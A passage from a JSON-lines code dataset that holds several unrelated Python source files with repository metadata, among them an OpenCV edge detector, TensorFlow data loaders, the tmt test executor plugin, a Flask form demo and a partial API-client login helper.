max(left_x)\n k = left_x.index(x_main)\n left_average = left_lines[k]\n rr = cv2.line(image, (left_average[2][0], left_average[2][1]), (\n left_average[2][2], left_average[2][3]), (0, 0, 255), 3, cv2.LINE_AA)\n cv2.imwrite(\"sssdd.jpg\", rr)\n else:\n left_average = []\n if len(right_lines) > 0:\n for k in range(len(right_lines)):\n right_x.append(560/right_lines[k][0] -\n right_lines[k][1]/right_lines[k][0])\n x_main = min(right_x)\n k = right_x.index(x_main)\n right_average = right_lines[k]\n cv2.line(rr, (right_average[2][0], right_average[2][1]), (\n right_average[2][2], right_average[2][3]), (0, 0, 255), 3, cv2.LINE_AA)\n else:\n right_average = []\n if left_average != [] and right_average != []:\n fit_1 = [left_average[0], left_average[1]]\n fit_2 = [right_average[0], right_average[1]]\n return fit_1, fit_2, 1\n if left_average == [] and right_average != []:\n fit = [right_average[0], right_average[1]]\n return [], fit, 2\n if left_average != [] and right_average == []:\n fit = [left_average[0], left_average[1]]\n return fit, [], 3\n if left_average == [] and right_average == []:\n fit = []\n return fit, [], 0\nedge()","repo_name":"roboime/HRR-Intel","sub_path":"hrr/tests/edge_detector.py","file_name":"edge_detector.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18692603176","text":"# -*- encoding: utf-8 -*-\n'''\n@Filename : check_hourly_format.py\n@Datetime : 2020/06/17 14:43:00\n@Author : Joe-Bu\n@version : 1.0\n'''\n\nimport os\nimport sys\n\nSTD_NUM=46\n\n\ndef parse_err_time(filename):\n '''\n 获取发生错误的站点\n '''\n assert os.path.exists(filename)\n\n with open(filename, 'r') as f:\n cont = f.readlines()\n err_time = [f.split('_')[-1].split('.')[0] for f in cont]\n # print('\\n'.join(err_time))\n\n return err_time\n\n\ndef main():\n '''\n Main\n '''\n err_file = r'./err_hour.txt'\n parse_err_time(err_file)\n\n \nif __name__ == \"__main__\":\n main()","repo_name":"JoeBuzh/Pm_Composition_Quallity_Control","sub_path":"extract/getErrTime.py","file_name":"getErrTime.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36999694166","text":"import tensorflow as tf\nimport glob\n\nif tf.__version__.split(\".\",1)[0] == \"1\":\n pass\nelse:\n tf.truncated_normal_initializer=tf.compat.v1.truncated_normal_initializer\n tf.feature_column.shared_embedding_columns=tf.feature_column.shared_embeddings\n tf.feature_column.input_layer=tf.compat.v1.feature_column.input_layer\n tf.losses.log_loss=tf.compat.v1.losses.log_loss\n tf.metrics.auc=tf.compat.v1.losses.log_loss\n tf.train.get_global_step=tf.compat.v1.train.get_global_step\n\n\ndef _batched_parse(serialized_examples,schema):\n features=tf.io.parse_example(\n serialized_examples,\n features=schema\n )\n ctr=features.pop(\"finalClickFlag\")\n cvr=features.pop(\"pay_flag\")\n # ctr = tf.cast(features[\"finalClickFlag\"],tf.float32)\n # cvr = tf.cast(features[\"pay_flag\"],tf.float32)\n return features, {'ctr': ctr, 'cvr': cvr}\n\n\ndef loadtf(filenames,schema,batch_size=64,num_epochs=1):\n #filenames=glob.glob(pattern)\n seqlen=10\n for key in schema.keys():\n if \"list\" in key:\n schema[key]=tf.io.FixedLenFeature([seqlen], tf.string,default_value=[\"-1\"]*seqlen)\n ds=tf.data.TFRecordDataset(\n filenames,\n compression_type=None,\n buffer_size=None,\n num_parallel_reads=tf.data.AUTOTUNE,\n )\n ds=ds.repeat(num_epochs)\n ds=ds.shuffle(buffer_size= 50 * batch_size)\n ds=ds.batch(batch_size)\n ds=ds.map(lambda x:_batched_parse(x,schema),num_parallel_calls=tf.data.AUTOTUNE)\n ds=ds.prefetch(buffer_size=tf.data.AUTOTUNE)\n return ds\n\n\nclass CSVDataSet():\n def __init__(self,filelist,record_defaults,column_names,drop_columns=[],n_readers=4,num_parallel_calls=4,buffer_size=10240):\n self.filename_dataset = tf.data.Dataset.list_files(filelist)\n self.n_readers=n_readers\n self.record_defaults=record_defaults\n self.column_names=column_names\n self.drop_columns=drop_columns\n self.buffer_size=buffer_size\n self.num_parallel_calls=num_parallel_calls\n\n def getds(self,batch_size=1024,num_epochs=1):\n dataset = self.filename_dataset.interleave(\n lambda filename: tf.data.TextLineDataset(filename).skip(1).shuffle(self.buffer_size),\n #并行数为5,默认一次从并行数中取出一条数据\n cycle_length = self.n_readers\n )\n dataset = dataset.map(self.parse_csv, num_parallel_calls=self.num_parallel_calls)\n return dataset\n\n def parse_csv(self,value):\n columns = tf.io.decode_csv(value, record_defaults=self.record_defaults)\n features = dict(zip(self.column_names, columns))\n for col in self.drop_columns :\n features.pop(col)\n # for col in self.sequental_columns:\n # features[col]=tf.strings.to_number(tf.strings.split(features[col], sep='|').values, out_type=tf.dtypes.int64)\n ctr = features.pop('finalClickFlag')\n cvr = features.pop('pay_flag')\n ctr = tf.cast(tf.reshape(ctr, [1]),tf.float32)\n cvr = tf.cast(tf.reshape(cvr, [1]),tf.float32)\n return features, {'ctr': ctr, 'cvr': cvr}\n\n\ndef input_fn(file_list,column_names,record_defaults,drop_columns,num_epochs=1,batch_size=1024):\n dsiter=CSVDataSet(file_list,record_defaults,column_names,drop_columns)\n dataset=dsiter.getds()\n dataset = dataset.repeat(num_epochs)\n dataset=dataset.shuffle(buffer_size= 50 * batch_size)\n dataset = dataset.batch(batch_size)\n dataset=dataset.prefetch(buffer_size=tf.data.AUTOTUNE)\n return dataset\n\n\nif __name__ == \"__main__\":\n # schema=modelobj.feat_schema\n # loadtf(\"data/train_tf/*.tf\",schema,batch_size=64)\n pass","repo_name":"LiTugou/ljrec","sub_path":"utils/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16715410229","text":"import dataclasses\nimport json\nimport os\nimport sys\nimport time\nfrom typing import Any, Dict, List, Optional, cast\n\nimport click\n\nimport tmt\nimport tmt.options\nimport tmt.steps\nimport tmt.steps.execute\nimport tmt.utils\nfrom tmt.base import Test\nfrom tmt.result import Result, ResultOutcome\nfrom tmt.steps.execute import (SCRIPTS, TEST_OUTPUT_FILENAME,\n TMT_FILE_SUBMIT_SCRIPT, TMT_REBOOT_SCRIPT)\nfrom tmt.steps.provision import Guest\nfrom tmt.utils import EnvironmentType, Path, ShellScript\n\nTEST_WRAPPER_FILENAME = 'tmt-test-wrapper.sh'\n\nTEST_WRAPPER_INTERACTIVE = '{remote_command}'\nTEST_WRAPPER_NONINTERACTIVE = 'set -eo pipefail; {remote_command} Dict[str, Any]: # type: ignore[override]\n data = cast(Dict[str, Any], super().to_spec())\n data['script'] = [str(script) for script in self.script]\n\n return data\n\n def to_serialized(self) -> Dict[str, Any]:\n data = super().to_serialized()\n\n data['script'] = [str(script) for script in self.script]\n\n return data\n\n @classmethod\n def from_serialized(cls, serialized: Dict[str, Any]) -> 'ExecuteInternalData':\n \"\"\" Convert from a serialized form loaded from a file \"\"\"\n\n obj = super().from_serialized(serialized)\n obj.script = [ShellScript(script) for script in serialized['script']]\n\n return obj\n\n\n@tmt.steps.provides_method('tmt')\nclass ExecuteInternal(tmt.steps.execute.ExecutePlugin):\n \"\"\"\n Use the internal tmt executor to execute tests\n\n The internal tmt executor runs tests on the guest one by one, shows\n testing progress and supports interactive debugging as well. Test\n result is based on the script exit code (for shell tests) or the\n results file (for beakerlib tests).\n \"\"\"\n\n _data_class = ExecuteInternalData\n\n def __init__(self, **kwargs: Any):\n super().__init__(**kwargs)\n self._previous_progress_message = \"\"\n self.scripts = SCRIPTS\n\n @classmethod\n def options(cls, how: Optional[str] = None) -> List[tmt.options.ClickOptionDecoratorType]:\n \"\"\" Prepare command line options for given method \"\"\"\n return [\n click.option(\n '-s', '--script', metavar='SCRIPT', multiple=True,\n help='Shell script to be executed as a test.'),\n # Interactive mode\n click.option(\n '-i', '--interactive', is_flag=True,\n help='Run in interactive mode, do not capture output.'),\n # Disable interactive progress bar\n click.option(\n '--no-progress-bar', is_flag=True,\n help='Disable interactive progress bar showing the current test.')\n ] + super().options(how)\n\n # TODO: consider switching to utils.updatable_message() - might need more\n # work, since use of _show_progress is split over several methods.\n def _show_progress(self, progress: str, test_name: str,\n finish: bool = False) -> None:\n \"\"\"\n Show an interactive progress bar in non-verbose mode.\n\n If the output is not an interactive terminal, or progress bar is\n disabled using an option, just output the message as info without\n utilising \\r. If finish is True, overwrite the previous progress bar.\n \"\"\"\n # Verbose mode outputs other information, using \\r to\n # create a status bar wouldn't work.\n if self.opt('verbose'):\n return\n\n # No progress if terminal not attached or explicitly disabled\n if not sys.stdout.isatty() or self.opt('no-progress-bar'):\n return\n\n # For debug mode show just an info message (unless finishing)\n message = f\"{test_name} [{progress}]\" if not finish else \"\"\n if self.opt('debug'):\n if not finish:\n self.info(message, shift=1)\n return\n\n # Show progress bar in an interactive shell.\n # We need to completely override the previous message, add\n # spaces if necessary.\n message = message.ljust(len(self._previous_progress_message))\n self._previous_progress_message = message\n message = self._indent('progress', message, color='cyan')\n sys.stdout.write(f\"\\r{message}\")\n if finish:\n # The progress has been overwritten, return back to the start\n sys.stdout.write(\"\\r\")\n self._previous_progress_message = \"\"\n sys.stdout.flush()\n\n def _test_environment(\n self,\n test: Test,\n extra_environment: Optional[EnvironmentType] = None) -> EnvironmentType:\n \"\"\" Return test environment \"\"\"\n\n extra_environment = extra_environment or {}\n\n data_directory = self.data_path(test, full=True, create=True)\n\n environment = extra_environment.copy()\n environment.update(test.environment)\n assert self.parent is not None\n assert isinstance(self.parent, tmt.steps.execute.Execute)\n\n environment[\"TMT_TEST_DATA\"] = str(data_directory / tmt.steps.execute.TEST_DATA)\n environment[\"TMT_REBOOT_REQUEST\"] = str(\n data_directory / tmt.steps.execute.TEST_DATA / TMT_REBOOT_SCRIPT.created_file)\n # Set all supported reboot variables\n for reboot_variable in TMT_REBOOT_SCRIPT.related_variables:\n environment[reboot_variable] = str(test._reboot_count)\n # Variables related to beakerlib tests\n if test.framework == 'beakerlib':\n environment['BEAKERLIB_DIR'] = str(data_directory)\n environment['BEAKERLIB_COMMAND_SUBMIT_LOG'] = (\n f\"bash {TMT_FILE_SUBMIT_SCRIPT.path}\")\n\n return environment\n\n def _test_output_logger(\n self,\n key: str,\n value: Optional[str] = None,\n color: Optional[str] = None,\n shift: int = 2,\n level: int = 3,\n err: bool = False) -> None:\n \"\"\" Custom logger for test output with shift 2 and level 3 defaults \"\"\"\n self.verbose(key=key, value=value, color=color, shift=shift, level=level, err=err)\n\n def execute(self, test: Test, guest: Guest,\n extra_environment: Optional[EnvironmentType] = None) -> None:\n \"\"\" Run test on the guest \"\"\"\n self.debug(f\"Execute '{test.name}' as a '{test.framework}' test.\")\n\n # Test will be executed in it's own directory, relative to the workdir\n assert self.discover.workdir is not None # narrow type\n assert test.path is not None # narrow type\n workdir = self.discover.workdir / test.path.unrooted()\n self.debug(f\"Use workdir '{workdir}'.\", level=3)\n\n # Create data directory, prepare test environment\n environment = self._test_environment(test, extra_environment)\n\n test_wrapper_filepath = workdir / TEST_WRAPPER_FILENAME\n\n # Prepare the test command (use default options for shell tests)\n if test.framework == \"shell\":\n test_command = ShellScript(f\"{tmt.utils.SHELL_OPTIONS}; {test.test}\")\n else:\n test_command = test.test\n self.debug('Test script', str(test_command), level=3)\n\n # Prepare the wrapper, push to guest\n self.write(test_wrapper_filepath, str(test_command), 'w')\n test_wrapper_filepath.chmod(0o755)\n guest.push(\n source=test_wrapper_filepath,\n destination=test_wrapper_filepath,\n options=[\"-s\", \"-p\", \"--chmod=755\"])\n\n # Prepare the actual remote command\n remote_command = ShellScript(f'./{TEST_WRAPPER_FILENAME}')\n if self.get('interactive'):\n remote_command = ShellScript(\n TEST_WRAPPER_INTERACTIVE.format(\n remote_command=remote_command))\n else:\n remote_command = ShellScript(\n TEST_WRAPPER_NONINTERACTIVE.format(\n remote_command=remote_command))\n\n # Execute the test, save the output and return code\n start = time.time()\n try:\n stdout, _ = guest.execute(\n remote_command,\n cwd=workdir,\n env=environment,\n join=True,\n interactive=self.get('interactive'),\n log=self._test_output_logger,\n timeout=tmt.utils.duration_to_seconds(test.duration),\n test_session=True,\n friendly_command=str(test.test))\n test.returncode = 0\n except tmt.utils.RunError as error:\n stdout = error.stdout\n test.returncode = error.returncode\n if test.returncode == tmt.utils.PROCESS_TIMEOUT:\n self.debug(f\"Test duration '{test.duration}' exceeded.\")\n end = time.time()\n self.write(\n self.data_path(test, TEST_OUTPUT_FILENAME, full=True),\n stdout or '', mode='a', level=3)\n test.real_duration = self.test_duration(start, end)\n\n def check(self, test: Test) -> List[Result]:\n \"\"\" Check the test result \"\"\"\n self.debug(f\"Check result of '{test.name}'.\")\n if test.result == 'custom':\n return self.check_custom_results(test)\n if test.framework == 'beakerlib':\n return self.check_beakerlib(test)\n else:\n try:\n return self.check_result_file(test)\n except tmt.utils.FileError:\n return self.check_shell(test)\n\n def _will_reboot(self, test: Test) -> bool:\n \"\"\" True if reboot is requested \"\"\"\n return self._reboot_request_path(test).exists()\n\n def _reboot_request_path(self, test: Test) -> Path:\n \"\"\" Return reboot_request \"\"\"\n return self.data_path(test, full=True) \\\n / tmt.steps.execute.TEST_DATA \\\n / TMT_REBOOT_SCRIPT.created_file\n\n def _handle_reboot(self, test: Test, guest: Guest) -> bool:\n \"\"\"\n Reboot the guest if the test requested it.\n\n Check for presence of a file signalling reboot request\n and orchestrate the reboot if it was requested. Also increment\n REBOOTCOUNT variable, reset it to 0 if no reboot was requested\n (going forward to the next test). Return whether reboot was done.\n \"\"\"\n if self._will_reboot(test):\n test._reboot_count += 1\n self.debug(f\"Reboot during test '{test}' \"\n f\"with reboot count {test._reboot_count}.\")\n reboot_request_path = self._reboot_request_path(test)\n test_data = self.data_path(test, full=True) / tmt.steps.execute.TEST_DATA\n with open(reboot_request_path, 'r') as reboot_file:\n reboot_data = json.loads(reboot_file.read())\n reboot_command = None\n if reboot_data.get('command'):\n try:\n reboot_command = ShellScript(reboot_data.get('command'))\n except TypeError:\n pass\n try:\n timeout = int(reboot_data.get('timeout'))\n except ValueError:\n timeout = None\n # Reset the file\n os.remove(reboot_request_path)\n guest.push(test_data)\n rebooted = False\n try:\n rebooted = guest.reboot(command=reboot_command, timeout=timeout)\n except tmt.utils.RunError:\n self.fail(\n f\"Failed to reboot guest using the \"\n f\"custom command '{reboot_command}'.\")\n raise\n except tmt.utils.ProvisionError:\n self.warn(\n \"Guest does not support soft reboot, \"\n \"trying hard reboot.\")\n rebooted = guest.reboot(hard=True, timeout=timeout)\n if not rebooted:\n raise tmt.utils.RebootTimeoutError(\"Reboot timed out.\")\n return True\n return False\n\n def go(\n self,\n *,\n guest: 'Guest',\n environment: Optional[tmt.utils.EnvironmentType] = None,\n logger: tmt.log.Logger) -> None:\n \"\"\" Execute available tests \"\"\"\n super().go(guest=guest, environment=environment, logger=logger)\n self._results: List[Result] = []\n\n # Nothing to do in dry mode\n if self.opt('dry'):\n self._results = []\n return\n\n self._run_tests(guest)\n\n def _run_tests(\n self,\n guest: Guest,\n extra_environment: Optional[EnvironmentType] = None) -> None:\n \"\"\" Execute tests on provided guest \"\"\"\n\n # Prepare tests and helper scripts, check options\n tests = self.prepare_tests()\n exit_first = self.get('exit-first', default=False)\n\n # Prepare scripts, except localhost guest\n if not guest.localhost:\n self.prepare_scripts(guest)\n\n # Push workdir to guest and execute tests\n guest.push()\n # We cannot use enumerate here due to continue in the code\n index = 0\n while index < len(tests):\n test = tests[index]\n\n progress = f\"{index + 1}/{len(tests)}\"\n self._show_progress(progress, test.name)\n self.verbose(\n 'test', test.summary or test.name, color='cyan', shift=1, level=2)\n\n self.execute(test, guest, extra_environment=extra_environment)\n\n # Pull test logs from the guest, exclude beakerlib backups\n if test.framework == \"beakerlib\":\n exclude = [\n \"--exclude\",\n str(self.data_path(test, \"backup*\", full=True))]\n else:\n exclude = None\n guest.pull(\n source=self.data_path(test, full=True),\n extend_options=exclude)\n\n results = self.check(test) # Produce list of results\n assert test.real_duration is not None # narrow type\n duration = click.style(test.real_duration, fg='cyan')\n shift = 1 if self.opt('verbose') < 2 else 2\n\n # Handle reboot, abort, exit-first\n if self._will_reboot(test):\n # Output before the reboot\n self.verbose(\n f\"{duration} {test.name} [{progress}]\", shift=shift)\n try:\n if self._handle_reboot(test, guest):\n continue\n except tmt.utils.RebootTimeoutError:\n for result in results:\n result.result = ResultOutcome.ERROR\n result.note = 'reboot timeout'\n abort = self.check_abort_file(test)\n if abort:\n for result in results:\n # In case of aborted all results in list will be aborted\n result.note = 'aborted'\n self._results.extend(results)\n for result in results:\n # If test duration information is missing, print 8 spaces to keep indention\n duration = click.style(result.duration, fg='cyan') if result.duration else 8 * ' '\n self.verbose(f\"{duration} {result.show()} [{progress}]\", shift=shift)\n if (abort or exit_first and\n result.result not in (ResultOutcome.PASS, ResultOutcome.INFO)):\n # Clear the progress bar before outputting\n self._show_progress('', '', True)\n what_happened = \"aborted\" if abort else \"failed\"\n self.warn(\n f'Test {test.name} {what_happened}, stopping execution.')\n break\n index += 1\n\n # Log into the guest after each executed test if \"login\n # --test\" option is provided\n if self._login_after_test:\n assert test.path is not None # narrow type\n if self.discover.workdir is None:\n cwd = test.path.unrooted()\n else:\n cwd = self.discover.workdir / test.path.unrooted()\n self._login_after_test.after_test(\n result,\n cwd=cwd,\n env=self._test_environment(test, extra_environment),\n )\n # Overwrite the progress bar, the test data is irrelevant\n self._show_progress('', '', True)\n\n # Pull artifacts created in the plan data directory\n self.debug(\"Pull the plan data directory.\", level=2)\n guest.pull(source=self.step.plan.data_directory)\n\n def results(self) -> List[Result]:\n \"\"\" Return test results \"\"\"\n return self._results\n\n def requires(self) -> List[str]:\n \"\"\" Return list of required packages \"\"\"\n return []\n","repo_name":"danmyway/tmt","sub_path":"tmt/steps/execute/internal.py","file_name":"internal.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"29960550673","text":"import sys\n\nN = int(sys.stdin.readline())\n\nstack = []\nfor _ in range(N):\n order = sys.stdin.readline()\n if order[:2] == \"pu\": # push\n o, v = order.split()\n stack.append(int(v))\n elif order[:2] == \"po\": # pop\n if len(stack) == 0:\n print(-1)\n else:\n print(stack.pop())\n elif order[:2] == \"si\": # size\n print(len(stack))\n elif order[:2] == \"em\": # empty\n if len(stack) == 0:\n print(1)\n else:\n print(0)\n elif order[:2] == \"to\": #top\n if len(stack) == 0:\n print(-1)\n else:\n print(stack[-1])","repo_name":"GDSC-SCH/Algorithm-Study","sub_path":"04_이남준/week_04/10828.py","file_name":"10828.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31635045993","text":"from flask import Flask, render_template, request, redirect, url_for\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, PasswordField\nfrom wtforms.validators import DataRequired, ValidationError # 验证信息\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'hello flask'\n\n\nclass Name_Form(FlaskForm):\n name = StringField(\"What's your name\", validators=[DataRequired(message=u'内容不能不为空')],\n # label='请输入用户名',\n render_kw={\n \"required oninvalid\": \"setCustomValidity('请输入账号')\",\n \"class\": \"control-label col\",\n \"placeholder\": \"请输入你的名字\",\n \"oninput\": \" setCustomValidity('')\"\n })\n submit = SubmitField('Submit',\n render_kw={\n \"class\": \"btn btn-default\"\n })\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n form_tables = Name_Form() # 实例化\n if form_tables.validate_on_submit(): # 判断submit\n data = form_tables.name.data # 实例化 form_table.data\n\n print(data)\n return render_template('hello.html', form=form_tables)\n\n\nif __name__ == '__main__':\n app.run(port=8991)\n","repo_name":"Quan3Xin/helloFlask","sub_path":"hello_flask.py","file_name":"hello_flask.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26331789000","text":"# -*- coding: utf-8 -*-\n\nimport re\n\nfrom lascaux.router import Router\nfrom lascaux.execpath import Execpath\n\n\nclass RegexRouter(Router):\n\n def find_execpath(self, reqres):\n plugins = self.app.manager.get_subsystem('plugin').get_plugins()\n for plugin in plugins:\n for route in plugin.config['routes']:\n exec_path = self.check_match(reqres, route, plugin)\n if exec_path:\n return exec_path\n return None\n\n def check_match(self, reqres, route, plugin):\n regex = plugin.config['routes'][route]['regex']\n match = re.match(regex, reqres.uri)\n if match:\n return Execpath(reqres, plugin, route, \n plugin.controllers[plugin.config['routes'][route]['controller']],\n match.groupdict())\n return False\n","repo_name":"hyphyphyph/lascaux","sub_path":"lascaux/routers/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42796057745","text":"from random import *\nfrom math import *\ndef gera_vetor(x): # \"x\" é a dimensão do vetor.\n x = int(x)\n i = 0\n vetor=[0]*x\n inter = randint(1,(10*x))\n while i < len(vetor):\n vetor[i] = randint(-inter,inter)\n i = i + 1\n return vetor\n\ndef max_lista(L):\n t = 0\n maximo = L[0]\n while t < len(L):\n if maximo <= L[t]:\n maximo = L[t]\n t = t + 1\n return maximo\n\ndef encontra_maximo(M):\n t = 0\n Max = max_lista(M[0])\n while t < len(M):\n if Max <= max_lista(M[t]):\n Max = max_lista(M[t])\n t += 1\n return Max","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_175/ch6_2019_04_05_07_52_52_442509.py","file_name":"ch6_2019_04_05_07_52_52_442509.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16431577568","text":"import json\nimport math\nimport re\nfrom copy import deepcopy\nfrom string_util import *\nimport config as config\nfrom lists import Lists\n\ndef itself(x):\n return x\n\ndef transpose(t):\n u = []\n for i in range(0, len(t[1])):\n u.append([])\n for j in range(0, len(t)):\n u[i].append(t[j][i])\n return u \n\n\ndef dofile(sFile):\n with open(sFile, 'r', encoding = 'utf-8') as f:\n content = f.read()\n content = re.findall(r'(return\\s+[^.]+)', content)[0]\n map = {'return ' : '', '{' : '[', '}' : ']','=':':', '[\\n':'{\\n', '\\n]':'\\n}', '_':'\"_\"', '\\'':'\"'}\n for k,v in map.items():\n content = content.replace(k, v)\n content = re.sub(\"(\\w+):\",r'\"\\1\":',content)\n parsed_json = json.loads(content)\n return parsed_json\n\ndef repPlace(data):\n n,g = 20,{}\n for i in range(1, n+1):\n g[i]={}\n for j in range(1, n+1):\n g[i][j]=' '\n maxy = 0\n print('')\n for r,row in enumerate(data.rows):\n c = chr(97+r).upper()\n print(c, row.cells[-1])\n x,y= row.x*n//1, row.y*n//1\n maxy = int(max(maxy,y+1))\n g[y+1][x+1] = c\n print('')\n for y in range(1,maxy+1):\n print(' '.join(g[y].values()))\n\n\ndef last(t):\n return t[-1]\n\ndef rint(lo,hi):\n return math.floor(0.5 + rand(lo, hi))\n\ndef any(t):\n return t[rint(0, len(t))-1]\n\ndef rnd(n, nPlaces = 3):\n mult = 10**nPlaces\n return math.floor(n * mult + 0.5) / mult\n\ndef rand(lo, hi, mSeed = None):\n lo, hi = lo or 0, hi or 1\n Seed = config.Seed\n Seed = 1 if mSeed else (16807 * Seed) % 2147483647\n return lo + (hi-lo) * Seed / 2147483647\ndef many(t,n):\n u=[]\n for _ in range(1,n+1):\n u.append(any(t))\n return u\ndef cliffsDelta(ns1,ns2):\n if len(ns1) > 256:\n ns1 = many(ns1,256)\n if len(ns2) > 256:\n ns2 = many(ns2,256)\n if len(ns1) > 10*len(ns2):\n ns1 = many(ns1,10*len(ns2))\n if len(ns2) > 10*len(ns1):\n ns2 = many(ns2,10*len(ns1))\n n,gt,lt = 0,0,0\n for x in ns1:\n for y in ns2:\n n = n + 1\n if x > y:\n gt = gt + 1\n if x < y:\n lt = lt + 1\n return abs(lt - gt)/n > config.the['cliffs']\n\ndef diffs(nums1, nums2):\n def kap(nums, fn):\n return [fn(k, v) for k, v in enumerate(nums)]\n return kap(nums1, lambda k, nums: (cliffsDelta(nums.col.has, nums2[k].col.has), nums.col.txt))\n\ndef value(has,nB = None, nR = None, sGoal = None):\n sGoal,nB,nR = sGoal or True, nB or 1, nR or 1\n b,r = 0,0\n for x,n in has.items():\n if x==sGoal:\n b = b + n\n else:\n r = r + n\n b,r = b/(nB+1/float(\"inf\")), r/(nR+1/float(\"inf\"))\n return b**2/(b+r)\n\ndef showTree(node, what, cols, nPlaces, lvl = 0):\n if node:\n print('|.. ' * lvl + '[' + str(len(node['data'].rows)) + ']' + ' ', end = '')\n if not node.get('left') or lvl==0:\n print(node['data'].stats(\"mid\",node['data'].cols.y,nPlaces))\n else:\n print('')\n showTree(node.get('left'), what,cols, nPlaces, lvl+1)\n showTree(node.get('right'), what,cols,nPlaces, lvl+1)\ndef dkap(t, fun):\n u = {}\n for k,v in t.items():\n if(k and v is not None):\n v, k = fun(k,v) \n u[k or len(u)] = v\n return u\n\ndef firstN(sorted_ranges, scoreFun):\n print()\n for r in sorted_ranges:\n print(r['range']['txt'], r['range']['lo'], r['range']['hi'], rnd(r['val']), dict(r['range']['y'].has))\n first = sorted_ranges[0]['val']\n\n def useful(range):\n if range['val'] > 0.05 and range['val'] > first / 10:\n return range\n sorted_ranges = [s for s in sorted_ranges if useful(s)]\n most: int = -1\n out: int = -1\n\n for n in range(len(sorted_ranges)):\n tmp, rule = scoreFun([r['range'] for r in sorted_ranges[:n+1]])\n\n if tmp is not None and tmp > most:\n out, most = rule, tmp\n\n return out, most\n\ndef prune(rule, maxSize):\n n=0\n for txt,ranges in rule.items():\n n = n+1\n if len(ranges) == maxSize[txt]:\n n=n+1\n rule[txt] = None\n if n > 0:\n return rule","repo_name":"LeooHsiang/ASE-Group14-HW","sub_path":"src/hw6/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24049786772","text":"import boto3\nfrom util import sudocoins_logger\nimport json\nfrom datetime import datetime\nimport uuid\n\nlog = sudocoins_logger.get()\ndynamodb = boto3.resource('dynamodb')\n\n\ndef lambda_handler(event, context):\n body = json.loads(event.get('body', '{}'))\n log.info(f'event: {event}')\n log.info(f'payload: {body}')\n\n \"\"\"\n Handles connecting and disconnecting for the Websocket.\n Adds the connectionID to the database.\n Disconnect removes the connectionID from the database.\n \"\"\"\n connectionID = event[\"requestContext\"].get(\"connectionId\")\n\n if event[\"requestContext\"][\"eventType\"] == \"CONNECT\":\n log.info(\"Connect requested (CID: {})\".format(connectionID))\n\n # Ensure connectionID is valid\n if not connectionID:\n log.error(\"Failed: connectionId value not set.\")\n return _get_response(500, \"Connect not successful.\")\n\n # Add connectionID to the database\n table = dynamodb.Table(\"chat_connections\")\n table.put_item(Item={\"ConnectionId\": connectionID})\n return _get_response(200, \"Connect successful.\")\n\n elif event[\"requestContext\"][\"eventType\"] == \"DISCONNECT\":\n log.info(\"Disconnect requested (CID: {})\".format(connectionID))\n\n # Ensure connectionID is set\n if not connectionID:\n log.error(\"Failed: connectionId value not set.\")\n return _get_response(500, \"connectionId value not set.\")\n\n # Remove the connectionID from the database\n table = dynamodb.Table(\"chat_connections\")\n delete_response = table.delete_item(Key={\"ConnectionId\": connectionID})\n log.info(f'delete_response: {delete_response}')\n log.info(\"Disconnect successful\")\n return _get_response(200, \"Disconnect successful.\")\n\n else:\n log.error(\"Connection manager received unrecognized eventType '{}'\"\\\n .format(event[\"requestContext\"][\"eventType\"]))\n return _get_response(500, \"Unrecognized eventType.\")\n\n\ndef _get_response(status_code, body):\n if not isinstance(body, str):\n body = json.dumps(body)\n return {\"statusCode\": status_code, \"body\": body}\n\n","repo_name":"mobile1st/sudocoins-svc","sub_path":"src/art/chat/manage_connection.py","file_name":"manage_connection.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26464618510","text":"from urllib.parse import urljoin\nimport os\nimport requests\nfrom utils.exceptions import *\nfrom requests.cookies import cookiejar_from_dict\nfrom utils import credentials\n\nclass ApiClient:\n def __init__(self, base_url, user, password):\n self.base_url = base_url\n self.user = user\n self.password = password\n self.session = requests.Session()\n self.csrf_token = None\n\n def _request(self,method,location,headers=None,data=None,status=200,jsonify=True,params=None, allow_redirects=True,files = None,json = None):\n url=urljoin(self.base_url,location)\n response=self.session.request(method=method,url=url,params=params,data=data,headers=headers, allow_redirects=allow_redirects, files=files, json=json)\n if response.status_code != status:\n raise ResponseStatusCodeException(f'Got {response.status_code} {response.reason} for URL \"{url}\"')\n if jsonify:\n json_response = response.json()\n return json_response\n return response\n\n def get_token(self):\n response=self._request('GET',urljoin(self.base_url, 'csrf/'), jsonify=False)\n cookies=response.headers['Set-Cookie'].split(';')\n csrf_token= [c for c in cookies if 'csrftoken' in c][0]\n if not cookies:\n raise Exception(\"No csrftoken in headers\" )\n token=csrf_token.split('=')[-1]\n return token\n\n def post_login(self):\n login_url=\"https://auth-ac.my.com/auth\"\n headers={\n 'Referer': \"https://target.my.com/\",\n }\n data={\n 'email': self.user,\n 'password': self.password,\n \"continue\": \"https://target.my.com/auth/mycom?state=target_login%3D1%26ignore_opener%3D1#email\",\n \"failure\": \"https://account.my.com/login/\"\n }\n response=self._request('POST',login_url,headers=headers,data=data,jsonify=False)\n if self.session.cookies.get('z') is None or 